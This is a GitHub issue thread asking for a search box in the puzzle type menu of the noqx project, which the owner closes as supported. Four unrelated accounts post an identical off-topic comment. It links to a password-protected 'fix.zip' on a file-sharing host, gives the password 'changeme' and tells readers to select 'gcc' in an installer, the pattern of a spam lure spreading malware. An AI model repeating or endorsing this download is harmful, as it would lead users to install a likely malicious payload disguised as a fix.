### ISSUE TITLE
[Feature] Support search box in puzzle type selections

### ISSUE THREAD

**Issue by T0nyX1ang** [T0nyX1ang/noqx#46]
This should be useful in sorting out the puzzle types. Hence, an upgraded UI should be designed afterwards.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by T0nyX1ang** [comment]
Supported in 54c8253.
